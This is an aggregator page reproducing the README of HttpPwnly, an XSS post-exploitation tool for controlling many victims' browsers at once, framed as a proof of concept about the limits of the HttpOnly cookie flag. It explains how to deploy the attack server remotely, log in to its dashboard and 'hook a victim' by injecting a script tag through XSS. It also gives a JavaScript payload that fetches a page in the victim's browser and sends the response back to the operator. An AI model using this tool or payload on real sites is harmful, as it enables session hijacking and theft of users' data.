在线时间:8:00-16:00
迪恩网络APP
随时随地掌握行业动态
扫描二维码
关注迪恩网络微信公众号
开源软件名称:Danladi/HttpPwnly开源软件地址:https://github.com/Danladi/HttpPwnly开源编程语言:HTML 61.4%开源软件介绍:HttpPwnly"Repeater" style XSS post-exploitation tool for mass browser control. Primarily a PoC to show why HttpOnly flag isn't a complete protection against session hijacking via XSS. Dependencies:pip install -r requirements.txt Usage:to run the tool, simply use:
For production usage, you should run and configure a reverse proxy which offers both HTTP on port 80 and HTTPS on port 443 with a properly signed SSL certificate. This is free and fairly straightforward with Lets Encrypt providing you own a domain. See "Reverse proxy" below for further info and a copy-paste nginx config. When you run httppwnly, a randomly generated password for the user "admin" will be displayed in the terminal. At this point, visit https://[yourdomain]/login in your browser. After logging in, you will have access to the /dashboard. In order to hook a victim, you should write the following script tag to a page via XSS:
Demo:Asynchronous payloads:To overide normal task output data within your payload (for example in order to retrieve output from XMLHttpRequest), call the "sendOutput" function and pass it your intended output. For example: var xmlhttp = new XMLHttpRequest();
xmlhttp.onreadystatechange = function() {
if (xmlhttp.readyState == 4) {
sendOutput(id,xmlhttp.responseText);
}
};
xmlhttp.open("GET", "/", true);
xmlhttp.send(); Reverse proxy:HttpPwnly will bind to localhost:5000. In order to make the framework accessible remotely, the best approach is to use a reverse proxy. It's also recommended to offer HTTP as well as HTTPS, another reason to use a reverse proxy! I personally recommend using nginx for this. This is a working nginx config file:
|
2023-10-27
2022-08-15
2022-08-17
2022-09-23
2022-08-13
请发表评论